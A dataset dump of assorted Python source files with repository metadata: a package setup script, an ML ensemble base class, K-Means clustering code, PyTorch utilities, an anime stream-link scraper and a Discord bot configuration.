| 32.912429 | 122 | 0.618488 | 1,490 | 11,651 | 4.618121 | 0.239597 | 0.015114 | 0.030228 | 0.020927 | 0.224967 | 0.182677 | 0.126144 | 0.095771 | 0.083127 | 0.047377 | 0 | 0.029799 | 0.282808 | 11,651 | 353 | 123 | 33.005666 | 0.793562 | 0.167282 | 0 | 0.089494 | 0 | 0.015564 | 0.164349 | 0.100851 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023346 | false | 0.003891 | 0.050584 | 0 | 0.136187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b6d6a32049f0dfb679101cd399346994e52f62 | 932 | py | Python | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | 6 | 2018-09-01T21:00:20.000Z | 2022-01-11T11:13:38.000Z | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | null | null | null | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | null | null | null | from setuptools import setup
import io
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pyxstruct',
packages = ['pyxstruct'],
version = '1.0.3',
description = 'Scrape Geometric X-ray Data from the Cambridge Structural Database ',
long_description=long_description,
long_description_content_type='text/markdown',
author = 'Paton Research Group',
author_email = 'robert.paton@colostate.edu',
url = 'https://github.com/bobbypaton/pyX-Struct',
download_url = 'https://github.com/bobbypaton/pyX-Struct/archive/v1.0.3.zip',
keywords = ['x-ray structure', 'CCDC', 'SMILES', 'python'],
classifiers = [],
install_requires=["numpy","seaborn","pandas","matplotlib"],
python_requires='>=2.6',
include_package_data=True,
)
| 33.285714 | 86 | 0.722103 | 124 | 932 | 5.282258 | 0.677419 | 0.091603 | 0.058015 | 0.091603 | 0.109924 | 0.109924 | 0.109924 | 0 | 0 | 0 | 0 | 0.01107 | 0.127682 | 932 | 27 | 87 | 34.518519 | 0.794588 | 0.0397 | 0 | 0 | 0 | 0.043478 | 0.365471 | 0.029148 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44ba14a55225e2fca7e6776005ca90c19e46d4ef | 7,317 | py | Python | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
__author__ = 'yangjian'
"""
"""
import copy
import pickle
from sklearn.model_selection import StratifiedKFold
from hypernets.utils import fs
class BaseEnsemble:
    """Base class for ensembles that combine predictions of several estimators.

    Subclasses must implement :meth:`fit_predictions`,
    :meth:`predictions2predict` and :meth:`predictions2predict_proba`.
    """

    # numpy is deliberately bound as a class attribute; methods access it
    # via ``self.np`` (or rebind it locally as ``np = self.np``).
    import numpy as np

    def __init__(self, task, estimators, need_fit=False, n_folds=5, method='soft', random_state=9527):
        # task: 'regression' or a classification task name
        # estimators: base models; may be unfitted when need_fit is True
        # method: 'soft' (probabilities) or 'hard' (label votes) for classification
        self.task = task
        self.estimators = list(estimators)
        self.need_fit = need_fit
        self.method = method
        self.n_folds = n_folds
        self.random_state = random_state
        self.classes_ = None
        # Borrow class labels from the first estimator exposing ``classes_``.
        for est in estimators:
            if est is not None and self.classes_ is None and hasattr(est, 'classes_'):
                self.classes_ = est.classes_
                break

    def _estimator_predict(self, estimator, X):
        # Regression: raw predictions. Classification: probabilities,
        # collapsed to label indices when method == 'hard'.
        if self.task == 'regression':
            pred = estimator.predict(X)
        else:
            # if self.classes_ is None and hasattr(estimator, 'classes_'):
            #     self.classes_ = estimator.classes_
            assert self.classes_ is not None
            pred = estimator.predict_proba(X)
            if self.method == 'hard':
                pred = self.proba2predict(pred)
        return pred

    def _cross_validator(self):
        # CV splitter used when the base estimators still need fitting.
        return StratifiedKFold(n_splits=self.n_folds, shuffle=True, random_state=self.random_state)

    def proba2predict(self, proba, proba_threshold=0.5):
        """Convert class probabilities to label indices (no-op for regression)."""
        assert len(proba.shape) <= 2
        if self.task == 'regression':
            return proba
        if len(proba.shape) == 2:
            if proba.shape[-1] > 2:
                # Multiclass: pick the most probable class.
                predict = proba.argmax(axis=-1)
            else:
                # Binary: threshold the positive-class column.
                predict = (proba[:, -1] > proba_threshold).astype('int32')
        else:
            predict = (proba > proba_threshold).astype('int32')
        return predict

    def fit(self, X, y, est_predictions=None):
        """Fit the ensemble from precomputed predictions or from (X, y)."""
        assert y is not None
        if est_predictions is not None:
            self._validate_predictions(X, y, est_predictions)
        else:
            assert X is not None
            if self.need_fit:
                # Estimators are unfitted: fit per CV fold and use
                # out-of-fold predictions.
                est_predictions = self._Xy2predicttions(X, y)
            else:
                est_predictions = self._X2predictions(X)
        self.fit_predictions(est_predictions, y)

    def _validate_predictions(self, X, y, est_predictions):
        # Expected shape: (n_samples, n_estimators) for regression/hard voting,
        # (n_samples, n_estimators, n_classes) for soft voting.
        # print(f'est_predictions.shape:{est_predictions.shape}, estimators:{len(self.estimators)}')
        if self.task == 'regression' or self.method == 'hard':
            assert est_predictions.shape == (len(y), len(self.estimators)), \
                f'shape is not equal, may be a wrong task type. task:{self.task}, ' \
                f'est_predictions.shape: {est_predictions.shape}, ' \
                f'(len(y), len(self.estimators)):{(len(y), len(self.estimators))}'
        else:
            assert len(est_predictions.shape) == 3
            assert est_predictions.shape[0] == len(y)
            assert est_predictions.shape[1] == len(self.estimators)

    def _Xy2predicttions(self, X, y):
        # (sic: historical typo in the method name — part of the public surface,
        # so it is kept.) Fit every estimator on each CV training fold and
        # collect its out-of-fold predictions.
        if self.task == 'regression' or self.method == 'hard':
            np = self.np
            est_predictions = np.zeros((len(y), len(self.estimators)), dtype=np.float64)
        else:
            # Allocated lazily: the class count is known only after the
            # first predict_proba call.
            est_predictions = None
        iterators = self._cross_validator()
        for fold, (train, test) in enumerate(iterators.split(X, y)):
            for n, estimator in enumerate(self.estimators):
                X_train = X.iloc[train]
                y_train = y.iloc[train]
                X_test = X.iloc[test]
                estimator.fit(X_train, y_train)
                if self.classes_ is None and hasattr(estimator, 'classes_'):
                    self.classes_ = estimator.classes_
                pred = self._estimator_predict(estimator, X_test)
                if est_predictions is None:
                    np = self.np
                    est_predictions = np.zeros((len(y), len(self.estimators), pred.shape[1]), dtype=np.float64)
                est_predictions[test, n] = pred
        return est_predictions

    def _X2predictions(self, X):
        # Collect predictions of the already-fitted estimators on X.
        np = self.np
        if self.task == 'regression' or self.method == 'hard':
            est_predictions = np.zeros((len(X), len(self.estimators)), dtype=np.float64)
        else:
            est_predictions = np.zeros((len(X), len(self.estimators), len(self.classes_)), dtype=np.float64)
        for n, estimator in enumerate(self.estimators):
            if estimator is not None:
                pred = self._estimator_predict(estimator, X)
                if self.task == 'regression' and len(pred.shape) > 1:
                    # Flatten (n, 1) regression output to (n,).
                    assert pred.shape[1] == 1
                    pred = pred.reshape(pred.shape[0])
                est_predictions[:, n] = pred
        return est_predictions

    def predict(self, X):
        """Predict labels (classification) or values (regression) for X."""
        est_predictions = self._X2predictions(X)
        pred = self.predictions2predict(est_predictions)
        if self.task != 'regression' and self.classes_ is not None:
            # Map label indices back to the original class labels.
            np = self.np
            pred = np.take(np.array(self.classes_), pred, axis=0)
        return pred

    def predict_proba(self, X):
        """Predict class probabilities for X (classification only)."""
        est_predictions = self._X2predictions(X)
        return self.predictions2predict_proba(est_predictions)

    def fit_predictions(self, predictions, y_true):
        # Abstract: learn how to combine the per-estimator predictions.
        raise NotImplementedError()

    def predictions2predict_proba(self, predictions):
        # Abstract: combine per-estimator probabilities into ensemble proba.
        raise NotImplementedError()

    def predictions2predict(self, predictions):
        # Abstract: combine per-estimator predictions into ensemble labels.
        raise NotImplementedError()

    def save(self, model_path):
        """Persist the ensemble under ``model_path`` (treated as a directory)."""
        if not model_path.endswith(fs.sep):
            model_path = model_path + fs.sep
        if not fs.exists(model_path):
            fs.mkdirs(model_path, exist_ok=True)
        # Pickle a stub with the estimators blanked out; each estimator is
        # stored in its own file so large models stay out of the stub.
        stub = copy.copy(self)
        estimators = self.estimators
        if estimators is not None:
            stub.estimators = [None for _ in estimators]  # keep size
        if estimators is not None:
            for i, est in enumerate(estimators):
                est_pkl = f'{model_path}{i}.pkl'
                est_model = f'{model_path}{i}.model'
                # Remove stale files from a previous save.
                for t in [est_pkl, est_model]:
                    if fs.exists(t):
                        fs.rm(t)
                if est is None:
                    continue
                with fs.open(est_pkl, 'wb') as f:
                    pickle.dump(est, f, protocol=pickle.HIGHEST_PROTOCOL)
                # Estimators with their own persistence also get a side-car file.
                if hasattr(est, 'save') and hasattr(est, 'load'):
                    est.save(est_model)
        with fs.open(f'{model_path}ensemble.pkl', 'wb') as f:
            pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)

    @staticmethod
    def load(model_path):
        """Load an ensemble previously written by :meth:`save`.

        WARNING: uses ``pickle.load`` — only load model directories from
        trusted sources.
        """
        if not model_path.endswith(fs.sep):
            model_path = model_path + fs.sep
        with fs.open(f'{model_path}ensemble.pkl', 'rb') as f:
            stub = pickle.load(f)
        if stub.estimators is not None:
            for i in range(len(stub.estimators)):
                if fs.exists(f'{model_path}{i}.pkl'):
                    with fs.open(f'{model_path}{i}.pkl', 'rb') as f:
                        est = pickle.load(f)
                    # Prefer the estimator's own loader when a side-car exists.
                    if fs.exists(f'{model_path}{i}.model') and hasattr(est, 'load'):
                        est = est.load(f'{model_path}{i}.model')
                    stub.estimators[i] = est
        return stub
| 38.109375 | 111 | 0.574962 | 883 | 7,317 | 4.613817 | 0.150623 | 0.099656 | 0.022091 | 0.034364 | 0.425626 | 0.303387 | 0.22975 | 0.163476 | 0.121748 | 0.088856 | 0 | 0.009406 | 0.31707 | 7,317 | 191 | 112 | 38.308901 | 0.805884 | 0.030204 | 0 | 0.228758 | 0 | 0.006536 | 0.068907 | 0.029653 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0.098039 | false | 0 | 0.03268 | 0.006536 | 0.196078 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bdf8f5ecb0e60fa1e48ee58697351e0ea1c854 | 3,456 | py | Python | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.spatial import distance
import random
def mu_generator(X, K):
    """Pick K distinct random samples of X as initial cluster centers.

    Parameters
    ----------
    X : indexable sequence of samples (e.g. list of vectors or 2-D array)
    K : number of cluster centers to draw (must be <= len(X))

    Returns
    -------
    np.ndarray holding the K chosen samples.
    """
    mu = []
    # A set gives O(1) duplicate checks (the original list was O(K) per draw).
    chosen = set()
    for _ in range(K):
        rand = random.randint(0, len(X) - 1)
        # Re-draw until we hit an unused index, so centers are unique samples.
        while rand in chosen:
            rand = random.randint(0, len(X) - 1)
        chosen.add(rand)
        mu.append(X[rand])
    return np.array(mu)
def K_Means(X, K, mu):
    """Run Lloyd's K-Means iterations until the cluster centers converge.

    Parameters
    ----------
    X : 2-D array-like of training samples
    K : number of clusters
    mu : initial cluster centers; if empty, K distinct random samples are
         drawn via ``mu_generator``.

    Returns
    -------
    The converged cluster centers (same container/dtype as ``mu``).

    Notes
    -----
    The previous implementation recursed once per update step, which can
    exhaust the interpreter recursion limit on slowly converging data;
    this version iterates instead (same fixed point, same tie-breaking).
    """
    if len(mu) == 0:
        # No initial centers supplied: draw K distinct random samples.
        mu = mu_generator(X, K)
    while True:
        # Assign every sample to its closest center. Ties go to the
        # highest-index center, matching the original `<=` comparison.
        clusters = {cluster: [] for cluster in range(K)}
        for row in X:
            least_dist = float("inf")
            cluster_idx = None
            for idx in range(len(mu)):
                euclid_dist = distance.euclidean(row, mu[idx])
                if euclid_dist <= least_dist:
                    least_dist = euclid_dist
                    cluster_idx = idx
            clusters[cluster_idx].append(row)
        # Recompute each center as the mean of its members; empty clusters
        # keep their previous center.
        updated_mu = mu.copy()
        for cluster in range(K):
            if len(clusters[cluster]) == 0:
                continue
            for dim in range(len(X[0])):
                avg = sum(i[dim] for i in clusters[cluster]) / len(clusters[cluster])
                updated_mu[cluster][dim] = avg
        if np.all(mu == updated_mu):
            # Fixed point reached: centers did not move.
            return updated_mu
        mu = updated_mu
def K_Means_better(X, K):
    """Run K_Means from many random initialisations and return, by
    majority vote, the set of converged cluster centres reached most
    often."""
    votes = {}
    # One random initialisation per attempt; len(X)//2 attempts in total.
    initialisations = [mu_generator(X, K) for _ in range(int(len(X) / 2))]
    for initial_mu in initialisations:
        converged = K_Means(X, K, initial_mu)
        # Nested tuples are hashable, so a centre set can key a dictionary.
        centres_key = tuple(tuple(centre) for centre in converged)
        votes[centres_key] = votes.get(centres_key, 0) + 1
    # max() over (count, centres) pairs reproduces the original
    # tie-breaking behaviour of comparing tuples lexicographically.
    winning = max((count, centres) for centres, count in votes.items())
    return np.array(winning[1])
| 39.724138 | 97 | 0.640625 | 503 | 3,456 | 4.310139 | 0.272366 | 0.135609 | 0.031365 | 0.017989 | 0.066421 | 0.021218 | 0.021218 | 0 | 0 | 0 | 0 | 0.005263 | 0.285301 | 3,456 | 86 | 98 | 40.186047 | 0.87247 | 0.409722 | 0 | 0.076923 | 0 | 0 | 0.001489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.057692 | 0 | 0.173077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44be7e179d9f24df461429aeb0c1ef7aff9ab585 | 3,060 | py | Python | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | '''
Author: Liu Xin
Date: 2021-11-13 19:11:06
LastEditors: Liu Xin
LastEditTime: 2021-11-25 15:44:12
Description: 静态工具库
FilePath: /CVMI_Sementic_Segmentation/utils/static_common_utils.py
'''
import os
import random
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import warnings
from socket import gethostname
def set_random_seeds(seed: int = 6000):
    """Seed every random number generator used by the project.

    Seeds Python's ``random``, NumPy and PyTorch (CPU and all CUDA
    devices), and switches cuDNN into deterministic mode so repeated
    runs are reproducible.

    Args:
        seed (int): seed value applied everywhere (default 6000, the
            project's historical fixed seed).
    """
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # if you are using multi-GPU.
    np.random.seed(seed)  # Numpy module.
    random.seed(seed)  # Python random module.
    # The original called torch.manual_seed a second time here; the
    # duplicate call was redundant and has been removed.
    # Disable benchmark-driven kernel selection and force deterministic
    # cuDNN algorithms - both are needed for reproducible results.
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True
def is_method_overridden(method, base_class, derived_class):
"""检查基类的方法是否在派生类中被重写(copied by mmcv)
Args:
method (str): the method name to check.
base_class (type): the class of the base class.
derived_class (type | Any): the class or instance of the derived class.
"""
assert isinstance(base_class, type), \
"base_class doesn't accept instance, Please pass class instead."
if not isinstance(derived_class, type):
derived_class = derived_class.__class__
base_method = getattr(base_class, method)
derived_method = getattr(derived_class, method)
return derived_method != base_method
def getuser():
    """Get the username from the environment or password database.

    First try various environment variables, then the password
    database. This works on Windows as long as USERNAME is set.
    """
    for env_var in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):
        candidate = os.environ.get(env_var)
        if candidate:
            return candidate
    # If this fails, the exception will "explain" why
    import pwd
    return pwd.getpwuid(os.getuid())[0]
def get_host_info():
    """Return ``"user@hostname"``, or ``''`` if the lookup fails.

    User lookup can raise in e.g. docker containers with no passwd
    entry; such failures are reported as a warning and an empty
    string is returned instead.
    """
    # The original returned from a ``finally`` block, which silently
    # swallowed *every* in-flight exception, including BaseExceptions such
    # as KeyboardInterrupt. Returning from the except handler keeps only
    # the intended best-effort behaviour.
    try:
        return f'{getuser()}@{gethostname()}'
    except Exception as e:
        warnings.warn(f'Host or user not found: {str(e)}')
        return ''
def mkdir_or_exist(dir_name, mode=0o777):
    """Create *dir_name* (including missing parents) if it does not
    already exist; an empty string is silently ignored."""
    if dir_name == '':
        return
    expanded = os.path.expanduser(dir_name)
    os.makedirs(expanded, mode=mode, exist_ok=True)
def symlink(src, dst, overwrite=True, **kwargs):
    """Create a symlink at *dst* pointing to *src*.

    An existing file/link at *dst* is removed first when *overwrite* is
    True; extra keyword arguments are forwarded to ``os.symlink``.
    """
    dst_exists = os.path.lexists(dst)
    if dst_exists and overwrite:
        os.remove(dst)
    os.symlink(src, dst, **kwargs)
def build_work_dir_suffix(global_cfg, data_cfg):
    """Compose a work-directory name suffix of the form
    ``key_value.key_value...`` from run configuration fields."""
    fields = dict(
        bz=global_cfg.batch_size,
        gpus=global_cfg.gpus,
        optimizer_name=global_cfg.optimizer.name,
        lr=global_cfg.optimizer.lr,
        lr_sche=global_cfg.lr_config.policy,
        dataset=data_cfg.name,
    )
    return ".".join(f"{key}_{value}" for key, value in fields.items())
| 27.321429 | 79 | 0.66634 | 414 | 3,060 | 4.775362 | 0.439614 | 0.042489 | 0.027314 | 0.028832 | 0.042994 | 0.028326 | 0.028326 | 0 | 0 | 0 | 0 | 0.015711 | 0.230392 | 3,060 | 112 | 80 | 27.321429 | 0.823779 | 0.285294 | 0 | 0.033333 | 0 | 0 | 0.07604 | 0.012912 | 0 | 0 | 0 | 0 | 0.016667 | 1 | 0.116667 | false | 0.016667 | 0.133333 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bf0a5052cbf6a144e0a5b040f0b62cdb2a95c6 | 230 | py | Python | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | import csv
def get_receivers(csv_path="receivers.csv"):
    """Return the receiver addresses listed in the first column of a CSV file.

    Parameters
    ----------
    csv_path : str, optional
        Path of the CSV file to read (defaults to "receivers.csv",
        preserving the original behaviour).

    Returns
    -------
    list of str
        The first field of every non-empty row.
    """
    # newline='' is required by the csv module so quoted fields containing
    # newlines are parsed correctly.
    with open(csv_path, newline='') as fin:
        reader = csv.reader(fin)
        # Skip blank rows, which would otherwise raise IndexError on row[0].
        return [row[0] for row in reader if row]
| 19.166667 | 46 | 0.591304 | 30 | 230 | 4.5 | 0.633333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.304348 | 230 | 11 | 47 | 20.909091 | 0.8375 | 0.134783 | 0 | 0 | 0 | 0 | 0.071038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bfddd8311b2ce5f5b9d04ea8832fb97c03d8da | 4,309 | py | Python | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 554 | 2020-04-15T20:22:50.000Z | 2022-03-31T11:07:53.000Z | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 44 | 2020-04-15T19:26:43.000Z | 2022-03-11T09:59:24.000Z | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 61 | 2020-04-16T19:17:04.000Z | 2022-03-27T14:51:54.000Z | import re
from util.Episode import Episode
from bs4 import BeautifulSoup
from extractors.jwplayer_extractor import JWPlayerExtractor
from scrapers.base_scraper import BaseScraper
from util.Color import printer
class GoGoAnimeScraper(BaseScraper):
    """Scraper that collects direct (HLS/m3u8) stream links for a range of
    episodes of an anime hosted on GoGoAnime."""
    def __init__(self, url, start_episode, end_episode, session, gui=None, resolution="480"):
        """*url* is the anime's /category/ page; episodes numbered in
        [start_episode, end_episode] are resolved at *resolution*."""
        super().__init__(url, start_episode, end_episode, session, gui)
        self.resolution = resolution
        self.extractor = JWPlayerExtractor(None, self.session)
        self.anime_id = None
        # Known mirrors of the GoGoAnime episode-list API.
        self.api_link_bases = ['https://ajax.gogocdn.net/ajax/load-list-episode',
                               'https://ajax.apimovie.xyz/ajax/load-list-episode']
        self.__set_anime_id()

    def __set_anime_id(self):
        """Read the site-internal anime id from the hidden "movie_id" input
        element on the anime page; anime_id stays None on any failure."""
        response = self.session.get(self.url)
        if response.status_code == 200:
            soup_html = BeautifulSoup(response.content, "html.parser")
            movie_id_tag = soup_html.find("input", attrs={"id": "movie_id"})
            if movie_id_tag is not None:
                self.anime_id = movie_id_tag["value"]

    def __get_episode_data(self):
        """Ask each API mirror for the episode list in the requested range;
        return the first successful response body, or None if all fail."""
        for base_link in self.api_link_bases:
            api_link = base_link + "?ep_start=" + str(self.start_episode) + "&ep_end=" + str(
                self.end_episode) + "&id=" + self.anime_id
            response = self.session.get(api_link)
            if response.status_code == 200:
                return response.content
        return None

    def __get_page_url(self, href):
        """Build an absolute episode-page URL from a relative *href*."""
        # Raw string for the regex: the original non-raw patterns produced
        # invalid-escape warnings (e.g. "\S") on recent Python versions.
        base_url = re.search(r"(.*)/category/", self.url).group(1)
        return base_url + href

    def __set_stream_url(self, episode):
        """Resolve the m3u8 stream URL for *episode* and store it on
        episode.download_url.

        Returns True when the URL was found and stored, False otherwise.
        """
        response = self.session.get(episode.page_url)
        if response.status_code == 200:
            soup_html = BeautifulSoup(response.content, "html.parser")
            item_tag = soup_html.find("li", attrs={"class": "anime"}).find("a")
            streamer_url = item_tag["data-video"]
            # Protocol-relative links ("//host/...") need an explicit scheme.
            # The previous check - prefixing any URL not containing "https" -
            # also mangled valid http:// links into "https:http://...".
            if streamer_url.startswith("//"):
                streamer_url = "https:" + streamer_url
            streamer_resp = self.session.get(streamer_url)
            if streamer_resp.status_code == 200:
                sources = self.extractor.extract_sources(streamer_resp.text)
                # Pick the first HLS (m3u8) source offered by the player.
                src = ""
                for source in sources:
                    if "m3u8" in source:
                        src = source
                        break
                if src != "":
                    res_link_id = self.extractor.get_resolution_link(src, self.resolution)
                    stream_base = re.search(r"(.*)/[\S]+\.m3u8", src).group(1)
                    episode.download_url = stream_base + "/" + res_link_id
                    print("stream url:", episode.download_url)
                    return True
        return False

    def __collect_episodes(self):
        """Build Episode objects (with resolved stream URLs) for every
        episode number within the requested range."""
        printer("INFO", "Extracting page URLs...", self.gui)
        episodes = []
        if self.anime_id is not None:
            data = self.__get_episode_data()
            if data is not None:
                soup_html = BeautifulSoup(data, "html.parser")
                anchor_tags = soup_html.findAll("a", href=True)
                for anchor in anchor_tags:
                    href = anchor["href"].strip()
                    # The episode number is the trailing "-N" of the href.
                    epi_no = int(href.split("-")[-1])
                    if epi_no < self.start_episode or epi_no > self.end_episode:
                        continue
                    episode = Episode("Episode - " + str(epi_no), "Episode - " + str(epi_no))
                    episode.is_direct = False
                    episode.page_url = self.__get_page_url(href)
                    val = self.__set_stream_url(episode)
                    if val:
                        episodes.append(episode)
                    else:
                        printer("ERROR", "Failed to collect download link for " + episode.title, self.gui)
        return episodes

    def get_direct_links(self):
        """Public entry point: return the list of resolved episodes, or
        None when nothing could be collected or an error occurred."""
        try:
            episodes = self.__collect_episodes()
            if len(episodes) > 0:
                return episodes
            else:
                return None
        except Exception as ex:
            printer("ERROR", str(ex), self.gui)
            return None
| 38.81982 | 106 | 0.561383 | 489 | 4,309 | 4.695297 | 0.257669 | 0.018293 | 0.019164 | 0.028746 | 0.119338 | 0.093206 | 0.093206 | 0.062718 | 0.062718 | 0.062718 | 0 | 0.008395 | 0.336505 | 4,309 | 110 | 107 | 39.172727 | 0.794683 | 0.006034 | 0 | 0.134831 | 0 | 0 | 0.082243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.067416 | 0 | 0.258427 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bff82fd79a239bdafb6a54e8fdebc06260a17d | 1,355 | py | Python | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | '''
Constants necessary for the correct execution of this bot.
here, most of the values of the environment variables are extracted.
'''
from os import getenv
from pathlib import Path
# Base settings
# Absolute path of the package directory containing this module.
PROJECT_PATH = Path(__file__).resolve().parent
# Directory holding bundled UI asset files.
UI_RESOURCES_PATH = PROJECT_PATH / 'ui_resources'
# Bot token read from the 'mrdtoken' environment variable
# (None when the variable is not set).
BOT_TOKEN = getenv('mrdtoken')
# Extension modules loaded by the bot at startup.
EXTENSIONS_LIST = [
    'mr_dale.admin'
]
# Configuring the logging mechanism
LOG_FORMAT = {
    'format': '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
}
# dictConfig-style logging configuration: INFO and above to stdout,
# ERROR and above also to stderr, for both 'mr_dale' and 'discord' loggers.
LOGGING_SETTINGS = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {'default': LOG_FORMAT},
    'handlers': {
        'info_console_handler': {
            'class': 'logging.StreamHandler',
            'level': 'INFO',
            'formatter': 'default',
            'stream': 'ext://sys.stdout'
        },
        # NOTE(review): no 'formatter' key here, so this handler uses the
        # logging default format - confirm whether that is intentional.
        'error_console_handler': {
            'class': 'logging.StreamHandler',
            'level': 'ERROR',
            'stream': 'ext://sys.stderr'
        }
    },
    'loggers': {
        'mr_dale': {
            'level': 'INFO',
            'handlers': ['info_console_handler', 'error_console_handler'],
            'propagate': False
        },
        'discord': {
            'level': 'ERROR',
            'handlers': ['error_console_handler'],
            'propagate': False
        }
    }
}
